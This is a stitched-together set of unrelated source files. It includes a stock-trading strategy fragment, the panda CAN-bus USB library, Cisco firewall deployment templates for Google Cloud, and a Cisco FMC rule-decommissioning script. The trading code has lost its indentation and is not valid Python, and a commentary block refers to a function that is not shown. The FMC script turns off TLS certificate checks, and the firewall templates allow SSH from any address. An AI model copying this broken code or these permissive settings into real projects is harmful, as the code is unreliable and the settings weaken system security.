if checkthrough(MA5,MA10)[0] ==-1:
return 1
else:
return 0
# net money-flow condition
def a_condition_Flow_s(stock):
    # weekly main-capital net inflow below zero
delta = datetime.timedelta(days=get_weekday())
start = (get_datetime() - delta).strftime("%Y%m%d")
flow = get_money_flow([stock], start, get_date(), ['net_flow_rate'], count=None, is_panel=0)
this_week = sum(flow[stock].net_flow_rate)
if this_week < 0:
return 1
else:
return 0
# RSI condition
def a_condition_RSI_s(stock):
    # daily RSI gives a sell signal
price = history(stock, ['close'],20, '1d', False, 'pre', is_panel=1)
close = price['close']
RSI1 = talib.RSI(np.array(close), timeperiod=5)
RSI2 = talib.RSI(np.array(close), timeperiod=13)
if(RSI1[-1] < RSI1[-2]) and (RSI1[-1] < RSI2[-1]) and (RSI1[-2] > RSI2[-2]):
return 1
else:
return 0
def a_condition_Quate_s(stock,data):
if(len(data.history(stock, 'close', 2, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
now=data.history(stock, 'open', 2, '1d', True, None)[stock]['open'][0]
if now/begin < 0.97:
# log.info("b_1d")
return 1
else:
return 0
return 0
# --------------------------------------
# risk control
def a_riskDefend(account):
condition = 0
    # index price change
quote_rate = history('000001.SH', ['quote_rate'],10, '1d', False, 'pre', is_panel=1)['quote_rate']
if len(quote_rate)>1:
if quote_rate[-1]<-2.5:
condition += 1
if quote_rate[-1]<-2 and quote_rate[-2]<-2:
condition += 1
    # suspension check
suspension = 0
for stock in (get_all_securities('stock', get_date()).index):
        # changed the original 1d to 1m here, so it reads today's data instead of yesterday's
paused = history(stock, ['is_paused'], 5, '1m', False,'pre',is_panel=1)['is_paused']
if len(paused)>0 and paused[0]==1:
suspension+=1
if suspension > 20:
#log.info("停牌条件风控")
condition += 1
temp=[]
if condition > 0:
for stock in account.holdSl:
if stock in account.hold:
id=order_target(stock,0)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
else:
log.info("波段风控卖出"+stock)
account.holdSl.remove(stock)
account.hold.pop(stock)
# #重置 account.holdSl
# account.holdSl = list(set(account.holdSl) ^ set(temp))
# =======================
# Strategy B (hitBoard: limit-up chasing)
# --------------------------------------
# buy check
def b_buyCheck(stock,data):
v=data.current(stock)[stock]
close=v.prev_close
begin=v.open
    # the thresholds below are open to tuning
gains=(begin-close)/close
if gains>0.05 or gains<-0.02:
return -1
elif gains>=-0.02 and gains<=0.02:
return 0
elif gains>0.02 and gains<=0.05:
return 1
# return 0
# circulating market cap
def b_getMarket(stock):
q = query(
factor.date,
# factor.circulating_cap
factor.current_market_cap
).filter(
factor.symbol == stock,
factor.date == get_date()
)
if len(get_factors(q)['factor_current_market_cap'])==0:
return 0
elif get_factors(q)['factor_current_market_cap'][0] is None:
return 0
else:
return get_factors(q)['factor_current_market_cap'][0]
def b_getKDJ(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
K, D = talib.STOCH(np.array(high), np.array(low),np.array(close), 9, 3, 0, 3, 0)
J=3*K-2*D
return (K[-1]+D[-1]+J[-1])/3
# --------------------------------------
# sell check
def b_sellCheck(stock,data,account):
if stock in account.hold:
amount=account.positions[stock].total_amount
if b_riskDefend(stock,data):
order(stock,0,style="MarketOrder")
log.info("超短风控卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
elif b_rsiCheck(stock,data) or b_runtimeTrCheck(stock,data) or b_stopGains(stock,data):
order(stock,0,style="MarketOrder")
log.info("超短卖点卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
return
# take-profit check
def b_stopGains(stock,data):
if(len(data.history(stock, 'close', 1, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 1, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin >= 1.09:
# log.info("b_1d")
return True
else:
return False
return True
# RSI-based sell check
def b_rsiCheck(stock,data):
terms=8
RSI=pd.DataFrame({'rsi1':np.zeros(terms),'rsi2':np.zeros(terms)})
for i in range(terms):
rsi1=getRSI(b_deltaCalc(getHistory(stock,6,i,'60m'),data))
rsi2=getRSI(b_deltaCalc(getHistory(stock,12,i,'60m'),data))
RSI.ix[i,'rsi1']=rsi1
RSI.ix[i,'rsi2']=rsi2
flag=checkthrough(RSI['rsi1'],RSI['rsi2'])[0]
if flag==-1:
return True
else:
return False
# turnover-rate check
def b_runtimeTrCheck(stock,data):
#log.info(get_datetime())
if len(data.history(stock,'turnover_rate',1,'1m',True,None)[stock]['turnover_rate'])==0 or len(data.history(stock,'turnover_rate',1,'1d',True,None)[stock]['turnover_rate'])==0:
return False
#前日换手量
else:
exc_y=data.history(stock,'turnover_rate',1,'1d',True,None)[stock]['turnover_rate'][0]/(4*60)
exc_n=data.history(stock,'turnover_rate',1,'1m',True,None)[stock]['turnover_rate'][0]
if exc_n>1.3*exc_y:
return True
else:
return False
# compute per-bar up and down moves
def b_deltaCalc(close,data):
df=pd.DataFrame({'close':close,'up':np.zeros(len(close)),'down':np.zeros(len(close))})
for i in range(len(df)):
if i==0:
df.ix[i,'up']=0
df.ix[i,'down']=0
else:
if df.ix[i,'close']-df.ix[i-1,'close']>0:
df.ix[i,'up']=df.ix[i,'close']-df.ix[i-1,'close']
if df.ix[i,'close']-df.ix[i-1,'close']<0:
df.ix[i,'down']=df.ix[i,'close']-df.ix[i-1,'close']
return df
# --------------------------------------
# risk control
# single-day drop of 2.5%, two-day drop of 4%
def b_riskDefend(stock, data):
    # condition 1: single-day drop of more than 2%
if(len(data.history(stock, 'close', 1, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 1, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin < 0.975:
# log.info("b_1d")
return True
else:
#两日 3.5%
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin < 0.965:
# log.info("b_2d")
return True
else:
return False
def b_prevRiskDefend(stock,data):
    # condition 1: single-day drop of more than 2%
if(len(data.history(stock, 'close', 2, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
now=data.history(stock, 'open', 2, '1d', True, None)[stock]['open'][0]
if now/begin < 0.97:
# log.info("b_1d")
return True
return False
``` |
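The RSRS logic in `get_RSRS` above (OLS slope of window highs on lows, standardised across the last M windows and weighted by the final window's R-squared) can be illustrated outside the trading platform. This is a self-contained sketch on synthetic prices, not the strategy's own code:

```python
# Standalone illustration of the RSRS score computed in get_RSRS above.
# Synthetic prices replace the platform-specific history() call.
import numpy as np
import statsmodels.api as sm

def rsrs_score(high, low, n=20, m=400):
    slopes = np.zeros(m)
    r_squared = 0.0
    for i in range(m):
        x = sm.add_constant(low[i:i + n])          # low as the regressor
        results = sm.OLS(high[i:i + n], x).fit()   # OLS of high on low
        slopes[i] = results.params[1]
        if i == m - 1:
            r_squared = results.rsquared           # R-squared of the last window
    z = (slopes[-1] - slopes.mean()) / slopes.std()
    return z * r_squared                           # standardised slope weighted by fit quality

rng = np.random.default_rng(0)
low = np.cumsum(rng.normal(0, 1, 419)) + 100       # 419 = n + m - 1 bars
high = low + rng.uniform(0.5, 2.0, 419)
print(rsrs_score(high, low))
```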
{
"source": "1335654481ren/panda",
"score": 3
} |
#### File: panda/panda/__init__.py
```python
from __future__ import print_function
import binascii
import struct
import hashlib
import socket
import usb1
__version__ = '0.0.2'
class PandaHashMismatchException(Exception):
def __init__(self, hash_, expected_hash):
super(PandaHashMismatchException, self).__init__(
"Hash '%s' did not match the expected hash '%s'"%\
(binascii.hexlify(hash_), binascii.hexlify(expected_hash)))
def parse_can_buffer(dat):
ret = []
for j in range(0, len(dat), 0x10):
ddat = dat[j:j+0x10]
f1, f2 = struct.unpack("II", ddat[0:8])
extended = 4
if f1 & extended:
address = f1 >> 3
else:
address = f1 >> 21
ret.append((address, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
return ret
class PandaWifiStreaming(object):
def __init__(self, ip="192.168.0.10", port=1338):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.sendto("hello", (ip, port))
self.sock.setblocking(0)
self.ip = ip
self.port = port
def can_recv(self):
ret = []
while True:
try:
dat, addr = self.sock.recvfrom(0x200*0x10)
if addr == (self.ip, self.port):
ret += parse_can_buffer(dat)
except socket.error:
break
return ret
# stupid tunneling of USB over wifi and SPI
class WifiHandle(object):
def __init__(self, ip="192.168.0.10", port=1337):
self.sock = socket.create_connection((ip, port))
def __recv(self):
ret = self.sock.recv(0x44)
length = struct.unpack("I", ret[0:4])[0]
return ret[4:4+length]
def controlWrite(self, request_type, request, value, index, data, timeout=0):
# ignore data in reply, panda doesn't use it
return self.controlRead(request_type, request, value, index, 0, timeout)
def controlRead(self, request_type, request, value, index, length, timeout=0):
self.sock.send(struct.pack("HHBBHHH", 0, 0, request_type, request, value, index, length))
return self.__recv()
def bulkWrite(self, endpoint, data, timeout=0):
if len(data) > 0x10:
raise ValueError("Data must not be longer than 0x10")
self.sock.send(struct.pack("HH", endpoint, len(data))+data)
self.__recv() # to /dev/null
def bulkRead(self, endpoint, length, timeout=0):
self.sock.send(struct.pack("HH", endpoint, 0))
return self.__recv()
def close(self):
self.sock.close()
class Panda(object):
REQUEST_TYPE = usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE
def __init__(self, serial=None, claim=True):
if serial == "WIFI":
self._handle = WifiHandle()
print("opening WIFI device")
else:
context = usb1.USBContext()
self._handle = None
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
if serial is None or device.getSerialNumber() == serial:
print("opening device", device.getSerialNumber())
self._handle = device.open()
if claim:
self._handle.claimInterface(0)
self._handle.setInterfaceAltSetting(0, 0)
break
assert self._handle != None
def close(self):
self._handle.close()
@staticmethod
def list():
context = usb1.USBContext()
ret = []
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
ret.append(device.getSerialNumber())
# TODO: detect if this is real
#ret += ["WIFI"]
return ret
# ******************* health *******************
def health(self):
dat = self._handle.controlRead(Panda.REQUEST_TYPE, 0xd2, 0, 0, 13)
a = struct.unpack("IIBBBBB", dat)
return {"voltage": a[0], "current": a[1],
"started": a[2], "controls_allowed": a[3],
"gas_interceptor_detected": a[4],
"started_signal_detected": a[5],
"started_alt": a[6]}
# ******************* control *******************
def enter_bootloader(self):
try:
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xd1, 0, 0, b'')
except Exception as e:
print(e)
pass
def get_serial(self):
dat = self._handle.controlRead(Panda.REQUEST_TYPE, 0xd0, 0, 0, 0x20)
hashsig, calc_hash = dat[0x1c:], hashlib.sha1(dat[0:0x1c]).digest()[0:4]
if hashsig != calc_hash:
raise PandaHashMismatchException(calc_hash, hashsig)
return [dat[0:0x10], dat[0x10:0x10+10]]
def get_secret(self):
return self._handle.controlRead(Panda.REQUEST_TYPE, 0xd0, 1, 0, 0x10)
# ******************* configuration *******************
def set_controls_allowed(self, on):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xdc, (0x1337 if on else 0), 0, b'')
def set_gmlan(self, on, bus=2):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xdb, 1, bus, b'')
def set_uart_baud(self, uart, rate):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe1, uart, rate, b'')
def set_uart_parity(self, uart, parity):
# parity, 0=off, 1=even, 2=odd
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe2, uart, parity, b'')
def set_uart_callback(self, uart, install):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe3, uart, int(install), b'')
# ******************* can *******************
def can_send_many(self, arr):
snds = []
transmit = 1
extended = 4
for addr, _, dat, bus in arr:
assert len(dat) <= 8
if addr >= 0x800:
rir = (addr << 3) | transmit | extended
else:
rir = (addr << 21) | transmit
snd = struct.pack("II", rir, len(dat) | (bus << 4)) + dat
snd = snd.ljust(0x10, b'\x00')
snds.append(snd)
while True:
try:
print("DAT: %s"%b''.join(snds).__repr__())
self._handle.bulkWrite(3, b''.join(snds))
break
except (usb1.USBErrorIO, usb1.USBErrorOverflow):
print("CAN: BAD SEND MANY, RETRYING")
def can_send(self, addr, dat, bus):
self.can_send_many([[addr, None, dat, bus]])
def can_recv(self):
dat = bytearray()
while True:
try:
dat = self._handle.bulkRead(1, 0x10*256)
break
except (usb1.USBErrorIO, usb1.USBErrorOverflow):
print("CAN: BAD RECV, RETRYING")
return parse_can_buffer(dat)
# ******************* serial *******************
def serial_read(self, port_number):
return self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, port_number, 0, 0x40)
def serial_write(self, port_number, ln):
return self._handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xf0, 0, 0, b'')
def kline_drain(self, bus=2):
# drain buffer
bret = bytearray()
while True:
ret = self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, bus, 0, 0x40)
if len(ret) == 0:
break
bret += ret
return bytes(bret)
def kline_ll_recv(self, cnt, bus=2):
echo = bytearray()
while len(echo) != cnt:
echo += self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, bus, 0, cnt-len(echo))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0xf):
ts = x[i:i+0xf]
self._handle.bulkWrite(2, chr(bus).encode()+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print("**** ECHO ERROR %d ****" % i)
print(binascii.hexlify(echo))
print(binascii.hexlify(ts))
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
``` |
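A hedged usage sketch for the `Panda` class above; it obviously assumes a panda board is attached over USB, and the CAN address and payload are made up:

```python
# Hedged sketch: open the first attached panda and exchange some CAN traffic.
from panda import Panda

serials = Panda.list()                 # serial numbers of attached boards
if serials:
    p = Panda(serials[0])
    print(p.health())                  # voltage/current/ignition flags
    p.set_controls_allowed(True)
    p.can_send(0x123, b'\x01\x02\x03', bus=0)
    for address, _, dat, bus in p.can_recv():
        print(hex(address), bus, dat)
    p.close()
```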
{
"source": "1336996/secure-firewall",
"score": 2
} |
#### File: Deployment-Manager/templates/load_balancer.py
```python
from helpers import common
def getHealthCheck(name, region):
return {
'name': name,
'type': common.REGION_HEALTH_CHECKS_TYPE,
'properties': {
'description': 'Deployment Manager Managed.',
'type': 'TCP',
'checkIntervalSec': 1,
'timeoutSec': 1,
'healthyThreshold': 4,
'unhealthyThreshold': 5,
'region': region,
'tcpHealthCheck': {
'port': 22
}
}
}
def getExtRegionBackendService(instanceGroups, healthCheckName, region):
backend_service = {
'name': 'asa-region-be-ext',
'type': common.REGION_BACKEND_SERVICES_TYPE,
'properties': {
'description': 'Deployment Manager managed external backend service for ASA.',
'region': region,
'loadBalancingScheme': 'EXTERNAL',
'protocol': 'TCP',
'timeoutSec': 10,
'healthChecks': [
f"$(ref.{healthCheckName}.selfLink)"
],
'portName': 'http',
'backends': [
{
'balancingMode': 'CONNECTION',
'description': 'Deployment Manager managed instance group for ASA.',
'group': f"$(ref.{ig['name']}.selfLink)"
}
for ig in instanceGroups
]
}
}
return backend_service
def getIntRegionBackendService(instanceGroups, healthCheckName, region, internalNetwork):
backend_service = {
'name': 'asa-region-be-int',
'type': common.REGION_BACKEND_SERVICES_TYPE,
'properties': {
'description': 'Deployment Manager managed internal backend service for ASA.',
'region': region,
'loadBalancingScheme': 'INTERNAL',
'protocol': 'TCP',
'network': f'$(ref.{internalNetwork}.selfLink)',
'healthChecks': [
f"$(ref.{healthCheckName}.selfLink)"
],
'backends': [
{
'balancingMode': 'CONNECTION',
'description': 'Deployment Manager managed instance group for ASA.',
'group': f"$(ref.{ig['name']}.selfLink)"
}
for ig in instanceGroups
]
}
}
return backend_service
def getInstanceGroups(context):
igs = []
for i in range(context.properties['num_instances']):
igs.append({
'name': common.getInstanceGroupName('uig-asa', i+1),
'type': common.INSTANCE_GROUP_TYPE,
'properties': {
'zone': context.properties['vm_zones'][i],
'namedPorts': [
{
'name': named_port['name'],
'port': named_port['port']
}
for named_port in context.properties['named_ports']
]
}
})
return igs
def getAddVMsToIG(context, instanceGroups):
actions = []
for i in range(context.properties['num_instances']):
ig = instanceGroups[i]
zone = context.properties['vm_zones'][i]
vm_name = common.getInstanceName(common.INSTANCE_PREFIX, i+1)
project = context.env['project']
selfLink = f"{common.COMPUTE_URL_BASE}projects/{project}/zones/{zone}/instances/{vm_name}"
actions.append({
'name': f"ig-{ig['name']}-members",
'action': common.ADD_INSTANCES_TYPE,
'properties': {
'zone': zone,
'project': project,
'instanceGroup': ig['name'],
'instances': [
{
'instance': selfLink
}
]
},
'metadata': {
'dependsOn': [ig['name'], vm_name]
}
})
return actions
def getExtForwardingRule(context, backendService):
return {
'name': 'asa-ext-fr',
'type': common.FORWARDING_RULE_TYPE,
'properties': {
'region': context.properties['region'],
'loadBalancingScheme': 'EXTERNAL',
'portRange': context.properties['service_port'],
'backendService': f"$(ref.{backendService['name']}.selfLink)"
}
}
def getIntForwardingRule(context, backendService):
internalNetwork = context.properties['inside_network']
return {
'name': 'asa-int-fr',
'type': common.FORWARDING_RULE_TYPE,
'properties': {
'region': context.properties['region'],
'loadBalancingScheme': 'INTERNAL',
'network': f'$(ref.{internalNetwork}.selfLink)',
'subnetwork': f'$(ref.{common.getSubnetName(internalNetwork)}.selfLink)',
'allowGlobalAccess': context.properties['allow_global_access'],
'ports': [
context.properties['service_port']
],
'backendService': f"$(ref.{backendService['name']}.selfLink)"
}
}
def GenerateConfig(context):
region = context.properties['region']
healthCheckName = common.getHealthCheckName('ssh', region)
intNetwork = context.properties['inside_network']
resources = []
outputs = []
# Create Unmanaged Instance Groups. One per instance
igs = getInstanceGroups(context)
# Add Health Check to be used
resources.append(getHealthCheck(healthCheckName, region))
# Add External Regional Backend Service using the created unmanaged instance groups
extBackendService = getExtRegionBackendService(igs, healthCheckName, region)
resources.append(extBackendService)
# Add the Unmanaged Instance Groups
resources.extend(igs)
# Add the created intances to their respective unmanaged instance groups
resources.extend(getAddVMsToIG(context, igs))
# Add External Forwarding Rule
extForwardingRule = getExtForwardingRule(context, extBackendService)
resources.append(extForwardingRule)
if context.properties['use_internal_lb']:
# Add Internal Regional Backend Service using the created unmanaged instance groups
intBackendService = getIntRegionBackendService(igs, healthCheckName, region, intNetwork)
resources.append(intBackendService)
# Add Internal Forwarding Rule
intForwardingRule = getIntForwardingRule(context, intBackendService)
resources.append(intForwardingRule)
# Add ILB ip address to outputs
outputs.append({
'name': 'internal_lb_ip',
'value': '$(ref.' + intForwardingRule['name'] + '.IPAddress)'
})
outputs.append({
'name': 'external_lb_ip',
'value': '$(ref.' + extForwardingRule['name'] + '.IPAddress)'
})
return {
'resources': resources,
'outputs': outputs
}
```
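Deployment Manager normally calls `GenerateConfig(context)` itself, but the template can be exercised locally with a stub context to inspect what it would emit. This sketch assumes the `helpers.common` module is importable; the property values are placeholders, not the project's real configuration:

```python
# Hedged sketch: drive GenerateConfig with a fake context object.
class StubContext:
    env = {'project': 'my-gcp-project'}            # placeholder project id
    properties = {
        'region': 'us-central1',
        'num_instances': 2,
        'vm_zones': ['us-central1-a', 'us-central1-b'],
        'named_ports': [{'name': 'http', 'port': 80}],
        'service_port': 80,
        'inside_network': 'inside-vpc',
        'use_internal_lb': True,
        'allow_global_access': False,
    }

config = GenerateConfig(StubContext())
for resource in config['resources']:
    print(resource['name'])
print(config['outputs'])
```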
#### File: Deployment-Manager/templates/networking.py
```python
from helpers import common
###################################
# VPC Networks and Firewall Rules
###################################
def getNetworkSelfLink(context, network):
return f"$(ref.{context.properties[network]}.selfLink)"
def GetNetwork(name, autoCreateSubnetworks):
network = {
'name': name,
'type': common.NETWORK_TYPE,
'properties':{
'autoCreateSubnetworks': autoCreateSubnetworks,
"routingConfig": {
"routingMode": 'GLOBAL'
}
}
}
return network
def GetSubNetwork(name, network, ipCidrRange, region, privateAccess, flowLogs):
subnet = {
'name': name,
'type': common.SUBNETWORK_TYPE,
'properties':{
'network': network,
'ipCidrRange': ipCidrRange,
'region': region,
'privateIpGoogleAccess': privateAccess,
'enableFlowLogs': flowLogs
}
}
return subnet
def GetFirewallRule(context, name, network, protocol, ports, sourceRanges):
firewall_rule = {
'name': name,
'type': common.FIREWALL_TYPE,
'properties':{
'network': network,
'sourceRanges': sourceRanges,
'allowed': [
{
'IPProtocol': protocol,
'ports': ports
}
],
'targetServiceAccounts': [context.properties['service_account']]
}
}
return firewall_rule
def GenerateConfig(context):
resources = []
networks_map = {}
for network in context.properties['networks']:
network_name = network['name']
resources.append(GetNetwork(network_name, False))
resources.append(GetSubNetwork(
common.getSubnetName(network_name),
f"$(ref.{network_name}.selfLink)",
network['cidr'],
context.properties['region'],
True,
False
))
# Management Firewall rules
if 'mgmt_network' in context.properties:
mgmt_self_link = getNetworkSelfLink(context, 'mgmt_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-https-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
["443"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# Inside Firewall rules
if 'inside_network' in context.properties:
inside_self_link = getNetworkSelfLink(context, 'inside_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-inside',
inside_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-inside',
inside_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# Outside Firewall rules
if 'outside_network' in context.properties:
outside_self_link = getNetworkSelfLink(context, 'outside_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-outside',
outside_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-outside',
outside_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# map for networks
networks_map = {
f"{network['name']}" : {
'name': network['name'],
'appliance_ip': network['appliance_ip'],
'external_ip': network['external_ip'],
'network_self_link': f"$(ref.{network['name']}.selfLink)",
'subnet_self_link': f"$(ref.{common.getSubnetName(network['name'])}.selfLink)"
}
for network in context.properties['networks']
}
# networks_list = []
# for network in context.properties['networks']:
# networks_list.append({
# 'name': network['name'],
# 'appliance_ip': network['appliance_ip'],
# 'external_ip': network['external_ip'],
# 'subnet_self_link': f"$(ref.{network['name']}.subnetworks[0])"
# })
outputs = [
{
'name': 'networks_map',
'value': networks_map
}
]
return {'resources': resources, 'outputs': outputs}
```
#### File: Automation_Scripts/decomission_AccessRules/decomission.py
```python
import requests
import argparse
from requests.auth import HTTPBasicAuth
import urllib3
import csv
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def createParser ():
parser = argparse.ArgumentParser()
parser.add_argument("--addr", required=True, help="Address of Cisco FMC")
parser.add_argument("--username", required=True, help="Username of Cisco FMC")
parser.add_argument("--password", required=True, help="Password of Cisco FMC")
parser.add_argument("--policy_name", required=True, help="Access policy name")
parser.add_argument("--ip", nargs="+", required=True,
help="Ip or network object id (list). "
"Example: -- ip 0.0.0.0 dde11d62-288b-4b4c-92e0-1dad0496f14b")
parser.add_argument("--delete", nargs='?', const=True, type=bool, help="Argument to be used if the rules should be deleted")
return parser
def fmc_gen_token():
api_uri = "/api/fmc_platform/v1/auth/generatetoken"
url = "https://" + args.addr + api_uri
response = requests.post(
url,
verify=False,
auth=HTTPBasicAuth(args.username, args.password),
)
return {
"X-auth-access-token": response.headers["X-auth-access-token"],
"X-auth-refresh-token": response.headers["X-auth-refresh-token"],
"DOMAIN_UUID": response.headers["DOMAIN_UUID"]
}
def get_policy_assignment(fmc_token):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies'
url = "https://" + args.addr + api_uri
headers = {
"X-auth-access-token": fmc_token["X-auth-access-token"],
'Content-Type': 'application/json'
}
response = requests.get(
url + f"?name={args.policy_name}",
headers=headers,
verify=False
)
return {"policy_id": response.json()["items"][0]["id"], "headers": headers}
def get_access_rule(fmc_token, policy_id):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies/{policy_id["policy_id"]}/accessrules'
url = "https://" + args.addr + api_uri
response = requests.get(
url + "?expanded=true",
headers=policy_id["headers"],
verify=False
)
return response.json()["items"]
rule_ids = []
rule_names = []
def find_rule(networks, access_rule):
for i in access_rule:
if networks in i:
key_object("literals", "value", networks, i)
key_object("objects", "id", networks, i)
def key_object(object_type, field, networks, i):
if object_type in i[networks]:
for k in i[networks][object_type]:
if k[field] in args.ip:
rule_ids.append(i["id"])
rule_names.append(i["name"])
def delete_access_rule(fmc_token, policy_id, rule_ids):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies/{policy_id["policy_id"]}/accessrules'
url = "https://" + args.addr + api_uri
response = requests.delete(
url + f'?bulk=true&filter=ids%3A{"%2C".join(rule_ids)}',
headers=policy_id["headers"],
verify=False
)
return response.status_code
f = open('/Users/sameersingh/Documents/vitalii/decomission/decommision.csv', 'w')
writer = csv.writer(f)
parser = createParser()
args = parser.parse_args()
fmc_token = fmc_gen_token()
policy_id = get_policy_assignment(fmc_token)
access_rule = get_access_rule(fmc_token, policy_id)
find_rule("sourceNetworks", access_rule)
find_rule("destinationNetworks", access_rule)
rule_ids = list(set(rule_ids))
print("Following rules have been identified to contain the provided IP Address or Object ID")
writer.writerow(["Following rules have been identified to contain the provided IP Address"])
print(rule_names)
for r in rule_names:
writer.writerow([r])
if args.delete == True:
status_code = delete_access_rule(fmc_token, policy_id, rule_ids)
print(status_code)
f.close()
```
#### File: Deployment_Manager/templates/ftd.py
```python
def GenerateConfig(context):
resources = []
# Enabling services
services = {
'name': 'enable_services',
'type': 'enable_services.py',
'properties': {
'services': context.properties['services']
}
}
# Service Account
sa = {
'name': 'service_accounts',
'type': 'service_accounts.py',
'properties': {
'account_id': context.properties['account_id'],
'display_name': context.properties['display_name']
},
'metadata': {
'dependsOn': ['enable_services']
}
}
# Networking provisioning
networking = {
'name': 'networking',
'type': 'networking.py',
'properties': {
'region': context.properties['region'],
'networks': context.properties['networks'],
'mgmt_network': context.properties['mgmt_network'],
'outside_network': context.properties['outside_network'],
'inside_network': context.properties['inside_network'],
'dmz_network': context.properties['dmz_network'],
'custom_route_tag': context.properties['custom_route_tag'],
# Using email from service_account's output
'service_account': '$(ref.service_accounts.email)'
}
}
# Appliance VMs
vm = {
'name': 'vm',
'type': 'vm.py',
'properties': {
'networks': context.properties['networks'],
'vm_zones': context.properties['vm_zones'],
'num_instances': context.properties['num_instances'],
'hostname': context.properties['hostname'],
'cisco_product_version': context.properties['cisco_product_version'],
'vm_machine_type': context.properties['vm_machine_type'],
'vm_instance_labels': context.properties['vm_instance_labels'],
'vm_instance_tags': context.properties['vm_instance_tags'],
'admin_ssh_pub_key': context.properties['admin_ssh_pub_key'],
'admin_password': context.properties['admin_password'],
'day_0_config': context.properties['day_0_config'],
'service_account': '$(ref.service_accounts.email)',
},
'metadata': {
'dependsOn': ['networking']
}
}
# Prepare all resources to be provisioned
resources += [services, sa, networking, vm]
outputs = [{
'name': 'vm_urls',
'value': '$(ref.vm.instance_urls)'
},{
'name': 'vm_external_ips',
'value': '$(ref.vm.vm_external_ips)'
}]
return {'resources': resources, 'outputs': outputs}
```
#### File: templates/helpers/common.py
```python
import random
import string
INSTANCE_TYPE = 'compute.v1.instance'
ADD_INSTANCES_TYPE = 'gcp-types/compute-v1:compute.instanceGroups.addInstances'
INSTANCE_GROUP_TYPE = 'compute.v1.instanceGroup'
REGION_BACKEND_SERVICES_TYPE = 'compute.v1.regionBackendServices'
REGION_HEALTH_CHECKS_TYPE = 'compute.v1.regionHealthChecks'
TCP_PROTOCOL = 'tcp'
NETWORK_TYPE = 'compute.v1.network'
SUBNETWORK_TYPE = 'compute.v1.subnetwork'
FIREWALL_TYPE = 'compute.v1.firewall'
FORWARDING_RULE_TYPE = 'compute.v1.forwardingRule'
COMPUTE_URL_BASE = 'https://www.googleapis.com/compute/v1/'
AUTH_URL_BASE = 'https://www.googleapis.com/auth/'
def getSubnetName(network_name):
return f"{network_name}-subnet-01"
def getHealthCheckName(prefix, sufix):
return f"{prefix}-health-check-{sufix}"
def getInstanceName(prefix, index):
return f'{prefix}-{index}'
def getInstanceGroupName(prefix, index):
return f'{prefix}-{index}'
def Ref(name):
return f'$(ref.{name}.selfLink)'
def RefGroup(name):
return '$(ref.{name}.instanceGroup)'
def randomString(length=5):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def randomizeName(name):
return f'{name}-{randomString()}'
``` |
{
"source": "1337235931/tensorflow-bee-yolov3_lastversion",
"score": 2
} |
#### File: 1337235931/tensorflow-bee-yolov3_lastversion/test.py
```python
import os
